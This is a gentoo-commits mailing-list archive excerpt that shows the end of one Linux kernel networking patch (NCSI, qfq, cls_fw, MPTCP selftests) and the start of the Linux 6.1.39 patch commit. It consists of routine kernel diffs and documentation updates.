+ 	if (unlikely(dev->ifindex == LOOPBACK_IFINDEX || netif_is_l3_master(skb->dev))) {
+ 		const struct rt6_info *rt6 = skb_rt6_info(skb);
+ 
+-		if (rt6)
++		/* The destination could be an external IP in Ext Hdr (SRv6, RPL, etc.),
++		 * and ip6_null_entry could be set to skb if no route is found.
++		 */
++		if (rt6 && rt6->rt6i_idev)
+ 			dev = rt6->rt6i_idev->dev;
+ 	}
+ 
+diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c
+index c029222ce46b0..04f1d696503cd 100644
+--- a/net/ipv6/udp.c
++++ b/net/ipv6/udp.c
+@@ -90,7 +90,7 @@ static u32 udp6_ehashfn(const struct net *net,
+ 	fhash = __ipv6_addr_jhash(faddr, udp_ipv6_hash_secret);
+ 
+ 	return __inet6_ehashfn(lhash, lport, fhash, fport,
+-			       udp_ipv6_hash_secret + net_hash_mix(net));
++			       udp6_ehash_secret + net_hash_mix(net));
+ }
+ 
+ int udp_v6_get_port(struct sock *sk, unsigned short snum)
+diff --git a/net/ncsi/ncsi-rsp.c b/net/ncsi/ncsi-rsp.c
+index 6447a09932f55..069c2659074bc 100644
+--- a/net/ncsi/ncsi-rsp.c
++++ b/net/ncsi/ncsi-rsp.c
+@@ -611,14 +611,14 @@ static int ncsi_rsp_handler_snfc(struct ncsi_request *nr)
+ 	return 0;
+ }
+ 
+-/* Response handler for Mellanox command Get Mac Address */
+-static int ncsi_rsp_handler_oem_mlx_gma(struct ncsi_request *nr)
++/* Response handler for Get Mac Address command */
++static int ncsi_rsp_handler_oem_gma(struct ncsi_request *nr, int mfr_id)
+ {
+ 	struct ncsi_dev_priv *ndp = nr->ndp;
+ 	struct net_device *ndev = ndp->ndev.dev;
+-	const struct net_device_ops *ops = ndev->netdev_ops;
+ 	struct ncsi_rsp_oem_pkt *rsp;
+ 	struct sockaddr saddr;
++	u32 mac_addr_off = 0;
+ 	int ret = 0;
+ 
+ 	/* Get the response header */
+@@ -626,11 +626,25 @@ static int ncsi_rsp_handler_oem_mlx_gma(struct ncsi_request *nr)
+ 
+ 	saddr.sa_family = ndev->type;
+ 	ndev->priv_flags |= IFF_LIVE_ADDR_CHANGE;
+-	memcpy(saddr.sa_data, &rsp->data[MLX_MAC_ADDR_OFFSET], ETH_ALEN);
++	if (mfr_id == NCSI_OEM_MFR_BCM_ID)
++		mac_addr_off = BCM_MAC_ADDR_OFFSET;
++	else if (mfr_id == NCSI_OEM_MFR_MLX_ID)
++		mac_addr_off = MLX_MAC_ADDR_OFFSET;
++	else if (mfr_id == NCSI_OEM_MFR_INTEL_ID)
++		mac_addr_off = INTEL_MAC_ADDR_OFFSET;
++
++	memcpy(saddr.sa_data, &rsp->data[mac_addr_off], ETH_ALEN);
++	if (mfr_id == NCSI_OEM_MFR_BCM_ID || mfr_id == NCSI_OEM_MFR_INTEL_ID)
++		eth_addr_inc((u8 *)saddr.sa_data);
++	if (!is_valid_ether_addr((const u8 *)saddr.sa_data))
++		return -ENXIO;
++
+ 	/* Set the flag for GMA command which should only be called once */
+ 	ndp->gma_flag = 1;
+ 
+-	ret = ops->ndo_set_mac_address(ndev, &saddr);
++	rtnl_lock();
++	ret = dev_set_mac_address(ndev, &saddr, NULL);
++	rtnl_unlock();
+ 	if (ret < 0)
+ 		netdev_warn(ndev, "NCSI: 'Writing mac address to device failed\n");
+ 
+@@ -649,41 +663,10 @@ static int ncsi_rsp_handler_oem_mlx(struct ncsi_request *nr)
+ 
+ 	if (mlx->cmd == NCSI_OEM_MLX_CMD_GMA &&
+ 	    mlx->param == NCSI_OEM_MLX_CMD_GMA_PARAM)
+-		return ncsi_rsp_handler_oem_mlx_gma(nr);
++		return ncsi_rsp_handler_oem_gma(nr, NCSI_OEM_MFR_MLX_ID);
+ 	return 0;
+ }
+ 
+-/* Response handler for Broadcom command Get Mac Address */
+-static int ncsi_rsp_handler_oem_bcm_gma(struct ncsi_request *nr)
+-{
+-	struct ncsi_dev_priv *ndp = nr->ndp;
+-	struct net_device *ndev = ndp->ndev.dev;
+-	const struct net_device_ops *ops = ndev->netdev_ops;
+-	struct ncsi_rsp_oem_pkt *rsp;
+-	struct sockaddr saddr;
+-	int ret = 0;
+-
+-	/* Get the response header */
+-	rsp = (struct ncsi_rsp_oem_pkt *)skb_network_header(nr->rsp);
+-
+-	saddr.sa_family = ndev->type;
+-	ndev->priv_flags |= IFF_LIVE_ADDR_CHANGE;
+-	memcpy(saddr.sa_data, &rsp->data[BCM_MAC_ADDR_OFFSET], ETH_ALEN);
+-	/* Increase mac address by 1 for BMC's address */
+-	eth_addr_inc((u8 *)saddr.sa_data);
+-	if (!is_valid_ether_addr((const u8 *)saddr.sa_data))
+-		return -ENXIO;
+-
+-	/* Set the flag for GMA command which should only be called once */
+-	ndp->gma_flag = 1;
+-
+-	ret = ops->ndo_set_mac_address(ndev, &saddr);
+-	if (ret < 0)
+-		netdev_warn(ndev, "NCSI: 'Writing mac address to device failed\n");
+-
+-	return ret;
+-}
+-
+ /* Response handler for Broadcom card */
+ static int ncsi_rsp_handler_oem_bcm(struct ncsi_request *nr)
+ {
+@@ -695,42 +678,10 @@ static int ncsi_rsp_handler_oem_bcm(struct ncsi_request *nr)
+ 	bcm = (struct ncsi_rsp_oem_bcm_pkt *)(rsp->data);
+ 
+ 	if (bcm->type == NCSI_OEM_BCM_CMD_GMA)
+-		return ncsi_rsp_handler_oem_bcm_gma(nr);
++		return ncsi_rsp_handler_oem_gma(nr, NCSI_OEM_MFR_BCM_ID);
+ 	return 0;
+ }
+ 
+-/* Response handler for Intel command Get Mac Address */
+-static int ncsi_rsp_handler_oem_intel_gma(struct ncsi_request *nr)
+-{
+-	struct ncsi_dev_priv *ndp = nr->ndp;
+-	struct net_device *ndev = ndp->ndev.dev;
+-	const struct net_device_ops *ops = ndev->netdev_ops;
+-	struct ncsi_rsp_oem_pkt *rsp;
+-	struct sockaddr saddr;
+-	int ret = 0;
+-
+-	/* Get the response header */
+-	rsp = (struct ncsi_rsp_oem_pkt *)skb_network_header(nr->rsp);
+-
+-	saddr.sa_family = ndev->type;
+-	ndev->priv_flags |= IFF_LIVE_ADDR_CHANGE;
+-	memcpy(saddr.sa_data, &rsp->data[INTEL_MAC_ADDR_OFFSET], ETH_ALEN);
+-	/* Increase mac address by 1 for BMC's address */
+-	eth_addr_inc((u8 *)saddr.sa_data);
+-	if (!is_valid_ether_addr((const u8 *)saddr.sa_data))
+-		return -ENXIO;
+-
+-	/* Set the flag for GMA command which should only be called once */
+-	ndp->gma_flag = 1;
+-
+-	ret = ops->ndo_set_mac_address(ndev, &saddr);
+-	if (ret < 0)
+-		netdev_warn(ndev,
+-			    "NCSI: 'Writing mac address to device failed\n");
+-
+-	return ret;
+-}
+-
+ /* Response handler for Intel card */
+ static int ncsi_rsp_handler_oem_intel(struct ncsi_request *nr)
+ {
+@@ -742,7 +693,7 @@ static int ncsi_rsp_handler_oem_intel(struct ncsi_request *nr)
+ 	intel = (struct ncsi_rsp_oem_intel_pkt *)(rsp->data);
+ 
+ 	if (intel->cmd == NCSI_OEM_INTEL_CMD_GMA)
+-		return ncsi_rsp_handler_oem_intel_gma(nr);
++		return ncsi_rsp_handler_oem_gma(nr, NCSI_OEM_MFR_INTEL_ID);
+ 
+ 	return 0;
+ }
+diff --git a/net/sched/cls_flower.c b/net/sched/cls_flower.c
+index 3de72e7c1075a..10e6ec0f94981 100644
+--- a/net/sched/cls_flower.c
++++ b/net/sched/cls_flower.c
+@@ -793,6 +793,16 @@ static int fl_set_key_port_range(struct nlattr **tb, struct fl_flow_key *key,
+ 		       TCA_FLOWER_KEY_PORT_SRC_MAX, &mask->tp_range.tp_max.src,
+ 		       TCA_FLOWER_UNSPEC, sizeof(key->tp_range.tp_max.src));
+ 
++	if (mask->tp_range.tp_min.dst != mask->tp_range.tp_max.dst) {
++		NL_SET_ERR_MSG(extack,
++			       "Both min and max destination ports must be specified");
++		return -EINVAL;
++	}
++	if (mask->tp_range.tp_min.src != mask->tp_range.tp_max.src) {
++		NL_SET_ERR_MSG(extack,
++			       "Both min and max source ports must be specified");
++		return -EINVAL;
++	}
+ 	if (mask->tp_range.tp_min.dst && mask->tp_range.tp_max.dst &&
+ 	    ntohs(key->tp_range.tp_max.dst) <=
+ 	    ntohs(key->tp_range.tp_min.dst)) {
+diff --git a/net/sched/cls_fw.c b/net/sched/cls_fw.c
+index a32351da968cd..1212b057b129c 100644
+--- a/net/sched/cls_fw.c
++++ b/net/sched/cls_fw.c
+@@ -210,11 +210,6 @@ static int fw_set_parms(struct net *net, struct tcf_proto *tp,
+ 	if (err < 0)
+ 		return err;
+ 
+-	if (tb[TCA_FW_CLASSID]) {
+-		f->res.classid = nla_get_u32(tb[TCA_FW_CLASSID]);
+-		tcf_bind_filter(tp, &f->res, base);
+-	}
+-
+ 	if (tb[TCA_FW_INDEV]) {
+ 		int ret;
+ 		ret = tcf_change_indev(net, tb[TCA_FW_INDEV], extack);
+@@ -231,6 +226,11 @@ static int fw_set_parms(struct net *net, struct tcf_proto *tp,
+ 	} else if (head->mask != 0xFFFFFFFF)
+ 		return err;
+ 
++	if (tb[TCA_FW_CLASSID]) {
++		f->res.classid = nla_get_u32(tb[TCA_FW_CLASSID]);
++		tcf_bind_filter(tp, &f->res, base);
++	}
++
+ 	return 0;
+ }
+ 
+diff --git a/net/sched/sch_qfq.c b/net/sched/sch_qfq.c
+index 02098a02943eb..e150d08f182d8 100644
+--- a/net/sched/sch_qfq.c
++++ b/net/sched/sch_qfq.c
+@@ -113,6 +113,7 @@
+ 
+ #define QFQ_MTU_SHIFT		16	/* to support TSO/GSO */
+ #define QFQ_MIN_LMAX		512	/* see qfq_slot_insert */
++#define QFQ_MAX_LMAX		(1UL << QFQ_MTU_SHIFT)
+ 
+ #define QFQ_MAX_AGG_CLASSES	8 /* max num classes per aggregate allowed */
+ 
+@@ -214,9 +215,14 @@ static struct qfq_class *qfq_find_class(struct Qdisc *sch, u32 classid)
+ 	return container_of(clc, struct qfq_class, common);
+ }
+ 
++static struct netlink_range_validation lmax_range = {
++	.min = QFQ_MIN_LMAX,
++	.max = QFQ_MAX_LMAX,
++};
++
+ static const struct nla_policy qfq_policy[TCA_QFQ_MAX + 1] = {
+-	[TCA_QFQ_WEIGHT] = { .type = NLA_U32 },
+-	[TCA_QFQ_LMAX] = { .type = NLA_U32 },
++	[TCA_QFQ_WEIGHT] = NLA_POLICY_RANGE(NLA_U32, 1, QFQ_MAX_WEIGHT),
++	[TCA_QFQ_LMAX] = NLA_POLICY_FULL_RANGE(NLA_U32, &lmax_range),
+ };
+ 
+ /*
+@@ -375,8 +381,13 @@ static int qfq_change_agg(struct Qdisc *sch, struct qfq_class *cl, u32 weight,
+ 			   u32 lmax)
+ {
+ 	struct qfq_sched *q = qdisc_priv(sch);
+-	struct qfq_aggregate *new_agg = qfq_find_agg(q, lmax, weight);
++	struct qfq_aggregate *new_agg;
++
++	/* 'lmax' can range from [QFQ_MIN_LMAX, pktlen + stab overhead] */
++	if (lmax > QFQ_MAX_LMAX)
++		return -EINVAL;
+ 
++	new_agg = qfq_find_agg(q, lmax, weight);
+ 	if (new_agg == NULL) { /* create new aggregate */
+ 		new_agg = kzalloc(sizeof(*new_agg), GFP_ATOMIC);
+ 		if (new_agg == NULL)
+@@ -408,27 +419,25 @@ static int qfq_change_class(struct Qdisc *sch, u32 classid, u32 parentid,
+ 	}
+ 
+ 	err = nla_parse_nested_deprecated(tb, TCA_QFQ_MAX, tca[TCA_OPTIONS],
+-					  qfq_policy, NULL);
++					  qfq_policy, extack);
+ 	if (err < 0)
+ 		return err;
+ 
+-	if (tb[TCA_QFQ_WEIGHT]) {
++	if (tb[TCA_QFQ_WEIGHT])
+ 		weight = nla_get_u32(tb[TCA_QFQ_WEIGHT]);
+-		if (!weight || weight > (1UL << QFQ_MAX_WSHIFT)) {
+-			pr_notice("qfq: invalid weight %u\n", weight);
+-			return -EINVAL;
+-		}
+-	} else
++	else
+ 		weight = 1;
+ 
+-	if (tb[TCA_QFQ_LMAX])
++	if (tb[TCA_QFQ_LMAX]) {
+ 		lmax = nla_get_u32(tb[TCA_QFQ_LMAX]);
+-	else
++	} else {
++		/* MTU size is user controlled */
+ 		lmax = psched_mtu(qdisc_dev(sch));
+-
+-	if (lmax < QFQ_MIN_LMAX || lmax > (1UL << QFQ_MTU_SHIFT)) {
+-		pr_notice("qfq: invalid max length %u\n", lmax);
+-		return -EINVAL;
++		if (lmax < QFQ_MIN_LMAX || lmax > QFQ_MAX_LMAX) {
++			NL_SET_ERR_MSG_MOD(extack,
++					   "MTU size out of bounds for qfq");
++			return -EINVAL;
++		}
+ 	}
+ 
+ 	inv_w = ONE_FP / weight;
+diff --git a/samples/ftrace/ftrace-direct-too.c b/samples/ftrace/ftrace-direct-too.c
+index 6690468c5cc2d..14c6859e1ac41 100644
+--- a/samples/ftrace/ftrace-direct-too.c
++++ b/samples/ftrace/ftrace-direct-too.c
+@@ -5,14 +5,14 @@
+ #include <linux/ftrace.h>
+ #include <asm/asm-offsets.h>
+ 
+-extern void my_direct_func(struct vm_area_struct *vma,
+-			   unsigned long address, unsigned int flags);
++extern void my_direct_func(struct vm_area_struct *vma, unsigned long address,
++			   unsigned int flags, struct pt_regs *regs);
+ 
+-void my_direct_func(struct vm_area_struct *vma,
+-			unsigned long address, unsigned int flags)
++void my_direct_func(struct vm_area_struct *vma, unsigned long address,
++		    unsigned int flags, struct pt_regs *regs)
+ {
+-	trace_printk("handle mm fault vma=%p address=%lx flags=%x\n",
+-		     vma, address, flags);
++	trace_printk("handle mm fault vma=%p address=%lx flags=%x regs=%p\n",
++		     vma, address, flags, regs);
+ }
+ 
+ extern void my_tramp(void *);
+@@ -32,7 +32,9 @@ asm (
+ "	pushq %rdi\n"
+ "	pushq %rsi\n"
+ "	pushq %rdx\n"
++"	pushq %rcx\n"
+ "	call my_direct_func\n"
++"	popq %rcx\n"
+ "	popq %rdx\n"
+ "	popq %rsi\n"
+ "	popq %rdi\n"
+diff --git a/tools/testing/selftests/net/mptcp/config b/tools/testing/selftests/net/mptcp/config
+index 6032f9b23c4c2..e317c2e44dae8 100644
+--- a/tools/testing/selftests/net/mptcp/config
++++ b/tools/testing/selftests/net/mptcp/config
+@@ -6,6 +6,7 @@ CONFIG_INET_DIAG=m
+ CONFIG_INET_MPTCP_DIAG=m
+ CONFIG_VETH=y
+ CONFIG_NET_SCH_NETEM=m
++CONFIG_SYN_COOKIES=y
+ CONFIG_NETFILTER=y
+ CONFIG_NETFILTER_ADVANCED=y
+ CONFIG_NETFILTER_NETLINK=m
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_connect.sh b/tools/testing/selftests/net/mptcp/mptcp_connect.sh
+index 36dc2bab7a13c..18c9b00ca058e 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_connect.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_connect.sh
+@@ -719,6 +719,7 @@ table inet mangle {
+ EOF
+ 	if [ $? -ne 0 ]; then
+ 		echo "SKIP: $msg, could not load nft ruleset"
++		mptcp_lib_fail_if_expected_feature "nft rules"
+ 		return
+ 	fi
+ 
+@@ -734,6 +735,7 @@ EOF
+ 	if [ $? -ne 0 ]; then
+ 		ip netns exec "$listener_ns" nft flush ruleset
+ 		echo "SKIP: $msg, ip $r6flag rule failed"
++		mptcp_lib_fail_if_expected_feature "ip rule"
+ 		return
+ 	fi
+ 
+@@ -742,6 +744,7 @@ EOF
+ 		ip netns exec "$listener_ns" nft flush ruleset
+ 		ip -net "$listener_ns" $r6flag rule del fwmark 1 lookup 100
+ 		echo "SKIP: $msg, ip route add local $local_addr failed"
++		mptcp_lib_fail_if_expected_feature "ip route"
+ 		return
+ 	fi
+ 
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_sockopt.sh b/tools/testing/selftests/net/mptcp/mptcp_sockopt.sh
+index a493eaf8633fc..af4fccd4f5cc0 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_sockopt.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_sockopt.sh
+@@ -121,6 +121,7 @@ check_mark()
+ 	for v in $values; do
+ 		if [ $v -ne 0 ]; then
+ 			echo "FAIL: got $tables $values in ns $ns , not 0 - not all expected packets marked" 1>&2
++			ret=1
+ 			return 1
+ 		fi
+ 	done
+@@ -220,11 +221,11 @@ do_transfer()
+ 	fi
+ 
+ 	if [ $local_addr = "::" ];then
+-		check_mark $listener_ns 6
+-		check_mark $connector_ns 6
++		check_mark $listener_ns 6 || retc=1
++		check_mark $connector_ns 6 || retc=1
+ 	else
+-		check_mark $listener_ns 4
+-		check_mark $connector_ns 4
++		check_mark $listener_ns 4 || retc=1
++		check_mark $connector_ns 4 || retc=1
+ 	fi
+ 
+ 	check_transfer $cin $sout "file received by server"
+diff --git a/tools/testing/selftests/net/mptcp/pm_nl_ctl.c b/tools/testing/selftests/net/mptcp/pm_nl_ctl.c
+index abddf4c63e797..1887bd61bd9a5 100644
+--- a/tools/testing/selftests/net/mptcp/pm_nl_ctl.c
++++ b/tools/testing/selftests/net/mptcp/pm_nl_ctl.c
+@@ -425,7 +425,7 @@ int dsf(int fd, int pm_family, int argc, char *argv[])
+ 	}
+ 
+ 	/* token */
+-	token = atoi(params[4]);
++	token = strtoul(params[4], NULL, 10);
+ 	rta = (void *)(data + off);
+ 	rta->rta_type = MPTCP_PM_ATTR_TOKEN;
+ 	rta->rta_len = RTA_LENGTH(4);
+@@ -551,7 +551,7 @@ int csf(int fd, int pm_family, int argc, char *argv[])
+ 	}
+ 
+ 	/* token */
+-	token = atoi(params[4]);
++	token = strtoul(params[4], NULL, 10);
+ 	rta = (void *)(data + off);
+ 	rta->rta_type = MPTCP_PM_ATTR_TOKEN;
+ 	rta->rta_len = RTA_LENGTH(4);
+@@ -598,7 +598,7 @@ int remove_addr(int fd, int pm_family, int argc, char *argv[])
+ 			if (++arg >= argc)
+ 				error(1, 0, " missing token value");
+ 
+-			token = atoi(argv[arg]);
++			token = strtoul(argv[arg], NULL, 10);
+ 			rta = (void *)(data + off);
+ 			rta->rta_type = MPTCP_PM_ATTR_TOKEN;
+ 			rta->rta_len = RTA_LENGTH(4);
+@@ -710,7 +710,7 @@ int announce_addr(int fd, int pm_family, int argc, char *argv[])
+ 			if (++arg >= argc)
+ 				error(1, 0, " missing token value");
+ 
+-			token = atoi(argv[arg]);
++			token = strtoul(argv[arg], NULL, 10);
+ 		} else
+ 			error(1, 0, "unknown keyword %s", argv[arg]);
+ 	}
+@@ -1347,7 +1347,7 @@ int set_flags(int fd, int pm_family, int argc, char *argv[])
+ 				error(1, 0, " missing token value");
+ 
+ 			/* token */
+-			token = atoi(argv[arg]);
++			token = strtoul(argv[arg], NULL, 10);
+ 		} else if (!strcmp(argv[arg], "flags")) {
+ 			char *tok, *str;
+ 
+diff --git a/tools/testing/selftests/net/mptcp/userspace_pm.sh b/tools/testing/selftests/net/mptcp/userspace_pm.sh
+index eb0f4f6afebd3..cb6c28d401293 100755
+--- a/tools/testing/selftests/net/mptcp/userspace_pm.sh
++++ b/tools/testing/selftests/net/mptcp/userspace_pm.sh
+@@ -387,6 +387,7 @@ test_remove()
+ 		stdbuf -o0 -e0 printf "[OK]\n"
+ 	else
+ 		stdbuf -o0 -e0 printf "[FAIL]\n"
++		exit 1
+ 	fi
+ 
+ 	# RM_ADDR using an invalid addr id should result in no action
+@@ -401,6 +402,7 @@ test_remove()
+ 		stdbuf -o0 -e0 printf "[OK]\n"
+ 	else
+ 		stdbuf -o0 -e0 printf "[FAIL]\n"
++		exit 1
+ 	fi
+ 
+ 	# RM_ADDR from the client to server machine
+@@ -847,7 +849,7 @@ test_prio()
+ 	local count
+ 
+ 	# Send MP_PRIO signal from client to server machine
+-	ip netns exec "$ns2" ./pm_nl_ctl set 10.0.1.2 port "$client4_port" flags backup token "$client4_token" rip 10.0.1.1 rport "$server4_port"
++	ip netns exec "$ns2" ./pm_nl_ctl set 10.0.1.2 port "$client4_port" flags backup token "$client4_token" rip 10.0.1.1 rport "$app4_port"
+ 	sleep 0.5
+ 
+ 	# Check TX


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-07-19 17:05 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-07-19 17:05 UTC (permalink / raw
  To: gentoo-commits

commit:     e542692b39596ae034479ec0e3aed41946c129ac
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Jul 19 17:05:00 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Jul 19 17:05:00 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=e542692b

Linux patch 6.1.39

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 1038_linux-6.1.39.patch | 23193 ++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 23193 insertions(+)

diff --git a/1038_linux-6.1.39.patch b/1038_linux-6.1.39.patch
new file mode 100644
index 00000000..1739bab8
--- /dev/null
+++ b/1038_linux-6.1.39.patch
@@ -0,0 +1,23193 @@
+diff --git a/Documentation/ABI/testing/sysfs-driver-eud b/Documentation/ABI/testing/sysfs-driver-eud
+index 83f3872182a40..2bab0db2d2f0f 100644
+--- a/Documentation/ABI/testing/sysfs-driver-eud
++++ b/Documentation/ABI/testing/sysfs-driver-eud
+@@ -1,4 +1,4 @@
+-What:		/sys/bus/platform/drivers/eud/.../enable
++What:		/sys/bus/platform/drivers/qcom_eud/.../enable
+ Date:           February 2022
+ Contact:        Souradeep Chowdhury <quic_schowdhu@quicinc.com>
+ Description:
+diff --git a/Documentation/devicetree/bindings/power/reset/qcom,pon.yaml b/Documentation/devicetree/bindings/power/reset/qcom,pon.yaml
+index d96170eecbd22..0b1eca734d3b1 100644
+--- a/Documentation/devicetree/bindings/power/reset/qcom,pon.yaml
++++ b/Documentation/devicetree/bindings/power/reset/qcom,pon.yaml
+@@ -56,7 +56,6 @@ required:
+ unevaluatedProperties: false
+ 
+ allOf:
+-  - $ref: reboot-mode.yaml#
+   - if:
+       properties:
+         compatible:
+@@ -66,6 +65,9 @@ allOf:
+               - qcom,pms405-pon
+               - qcom,pm8998-pon
+     then:
++      allOf:
++        - $ref: reboot-mode.yaml#
++
+       properties:
+         reg:
+           maxItems: 1
+diff --git a/Documentation/fault-injection/provoke-crashes.rst b/Documentation/fault-injection/provoke-crashes.rst
+index 3abe842256139..1f087e502ca6d 100644
+--- a/Documentation/fault-injection/provoke-crashes.rst
++++ b/Documentation/fault-injection/provoke-crashes.rst
+@@ -29,7 +29,7 @@ recur_count
+ cpoint_name
+ 	Where in the kernel to trigger the action. It can be
+ 	one of INT_HARDWARE_ENTRY, INT_HW_IRQ_EN, INT_TASKLET_ENTRY,
+-	FS_DEVRW, MEM_SWAPOUT, TIMERADD, SCSI_QUEUE_RQ, or DIRECT.
++	FS_SUBMIT_BH, MEM_SWAPOUT, TIMERADD, SCSI_QUEUE_RQ, or DIRECT.
+ 
+ cpoint_type
+ 	Indicates the action to be taken on hitting the crash point.
+diff --git a/Documentation/filesystems/autofs-mount-control.rst b/Documentation/filesystems/autofs-mount-control.rst
+index bf4b511cdbe85..b5a379d25c40b 100644
+--- a/Documentation/filesystems/autofs-mount-control.rst
++++ b/Documentation/filesystems/autofs-mount-control.rst
+@@ -196,7 +196,7 @@ information and return operation results::
+ 		    struct args_ismountpoint	ismountpoint;
+ 	    };
+ 
+-	    char path[0];
++	    char path[];
+     };
+ 
+ The ioctlfd field is a mount point file descriptor of an autofs mount
+diff --git a/Documentation/filesystems/autofs.rst b/Documentation/filesystems/autofs.rst
+index 4f490278d22fc..3b6e38e646cd8 100644
+--- a/Documentation/filesystems/autofs.rst
++++ b/Documentation/filesystems/autofs.rst
+@@ -467,7 +467,7 @@ Each ioctl is passed a pointer to an `autofs_dev_ioctl` structure::
+ 			struct args_ismountpoint	ismountpoint;
+ 		};
+ 
+-                char path[0];
++                char path[];
+         };
+ 
+ For the **OPEN_MOUNT** and **IS_MOUNTPOINT** commands, the target
+diff --git a/Documentation/filesystems/directory-locking.rst b/Documentation/filesystems/directory-locking.rst
+index 504ba940c36c1..dccd61c7c5c3b 100644
+--- a/Documentation/filesystems/directory-locking.rst
++++ b/Documentation/filesystems/directory-locking.rst
+@@ -22,12 +22,11 @@ exclusive.
+ 3) object removal.  Locking rules: caller locks parent, finds victim,
+ locks victim and calls the method.  Locks are exclusive.
+ 
+-4) rename() that is _not_ cross-directory.  Locking rules: caller locks
+-the parent and finds source and target.  In case of exchange (with
+-RENAME_EXCHANGE in flags argument) lock both.  In any case,
+-if the target already exists, lock it.  If the source is a non-directory,
+-lock it.  If we need to lock both, lock them in inode pointer order.
+-Then call the method.  All locks are exclusive.
++4) rename() that is _not_ cross-directory.  Locking rules: caller locks the
++parent and finds source and target.  We lock both (provided they exist).  If we
++need to lock two inodes of different type (dir vs non-dir), we lock directory
++first.  If we need to lock two inodes of the same type, lock them in inode
++pointer order.  Then call the method.  All locks are exclusive.
+ NB: we might get away with locking the source (and target in exchange
+ case) shared.
+ 
+@@ -44,15 +43,17 @@ All locks are exclusive.
+ rules:
+ 
+ 	* lock the filesystem
+-	* lock parents in "ancestors first" order.
++	* lock parents in "ancestors first" order. If one is not ancestor of
++	  the other, lock them in inode pointer order.
+ 	* find source and target.
+ 	* if old parent is equal to or is a descendent of target
+ 	  fail with -ENOTEMPTY
+ 	* if new parent is equal to or is a descendent of source
+ 	  fail with -ELOOP
+-	* If it's an exchange, lock both the source and the target.
+-	* If the target exists, lock it.  If the source is a non-directory,
+-	  lock it.  If we need to lock both, do so in inode pointer order.
++	* Lock both the source and the target provided they exist. If we
++	  need to lock two inodes of different type (dir vs non-dir), we lock
++	  the directory first. If we need to lock two inodes of the same type,
++	  lock them in inode pointer order.
+ 	* call the method.
+ 
+ All ->i_rwsem are taken exclusive.  Again, we might get away with locking
+@@ -66,8 +67,9 @@ If no directory is its own ancestor, the scheme above is deadlock-free.
+ 
+ Proof:
+ 
+-	First of all, at any moment we have a partial ordering of the
+-	objects - A < B iff A is an ancestor of B.
++	First of all, at any moment we have a linear ordering of the
++	objects - A < B iff (A is an ancestor of B) or (B is not an ancestor
++        of A and ptr(A) < ptr(B)).
+ 
+ 	That ordering can change.  However, the following is true:
+ 
+diff --git a/Documentation/networking/af_xdp.rst b/Documentation/networking/af_xdp.rst
+index 60b217b436be6..5b77b9e5ac7e6 100644
+--- a/Documentation/networking/af_xdp.rst
++++ b/Documentation/networking/af_xdp.rst
+@@ -433,6 +433,15 @@ start N bytes into the buffer leaving the first N bytes for the
+ application to use. The final option is the flags field, but it will
+ be dealt with in separate sections for each UMEM flag.
+ 
++SO_BINDTODEVICE setsockopt
++--------------------------
++
++This is a generic SOL_SOCKET option that can be used to tie AF_XDP
++socket to a particular network interface.  It is useful when a socket
++is created by a privileged process and passed to a non-privileged one.
++Once the option is set, kernel will refuse attempts to bind that socket
++to a different interface.  Updating the value requires CAP_NET_RAW.
++
+ XDP_STATISTICS getsockopt
+ -------------------------
+ 
+diff --git a/Makefile b/Makefile
+index 57c891b8b13cc..f0619754c29a5 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 38
++SUBLEVEL = 39
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arc/include/asm/linkage.h b/arch/arc/include/asm/linkage.h
+index c9434ff3aa4ce..8a3fb71e9cfad 100644
+--- a/arch/arc/include/asm/linkage.h
++++ b/arch/arc/include/asm/linkage.h
+@@ -8,6 +8,10 @@
+ 
+ #include <asm/dwarf.h>
+ 
++#define ASM_NL		 `	/* use '`' to mark new line in macro */
++#define __ALIGN		.align 4
++#define __ALIGN_STR	__stringify(__ALIGN)
++
+ #ifdef __ASSEMBLY__
+ 
+ .macro ST2 e, o, off
+@@ -28,10 +32,6 @@
+ #endif
+ .endm
+ 
+-#define ASM_NL		 `	/* use '`' to mark new line in macro */
+-#define __ALIGN		.align 4
+-#define __ALIGN_STR	__stringify(__ALIGN)
+-
+ /* annotation for data we want in DCCM - if enabled in .config */
+ .macro ARCFP_DATA nm
+ #ifdef CONFIG_ARC_HAS_DCCM
+diff --git a/arch/arm/boot/dts/bcm53015-meraki-mr26.dts b/arch/arm/boot/dts/bcm53015-meraki-mr26.dts
+index 14f58033efeb9..ca2266b936ee2 100644
+--- a/arch/arm/boot/dts/bcm53015-meraki-mr26.dts
++++ b/arch/arm/boot/dts/bcm53015-meraki-mr26.dts
+@@ -128,7 +128,7 @@
+ 
+ 			fixed-link {
+ 				speed = <1000>;
+-				duplex-full;
++				full-duplex;
+ 			};
+ 		};
+ 	};
+diff --git a/arch/arm/boot/dts/bcm53016-meraki-mr32.dts b/arch/arm/boot/dts/bcm53016-meraki-mr32.dts
+index e678bc03d8165..008de8ee2584a 100644
+--- a/arch/arm/boot/dts/bcm53016-meraki-mr32.dts
++++ b/arch/arm/boot/dts/bcm53016-meraki-mr32.dts
+@@ -187,7 +187,7 @@
+ 
+ 			fixed-link {
+ 				speed = <1000>;
+-				duplex-full;
++				full-duplex;
+ 			};
+ 		};
+ 	};
+diff --git a/arch/arm/boot/dts/bcm5301x.dtsi b/arch/arm/boot/dts/bcm5301x.dtsi
+index 5fc1b847f4aa5..787a0dd8216b7 100644
+--- a/arch/arm/boot/dts/bcm5301x.dtsi
++++ b/arch/arm/boot/dts/bcm5301x.dtsi
+@@ -542,7 +542,6 @@
+ 				  "spi_lr_session_done",
+ 				  "spi_lr_overread";
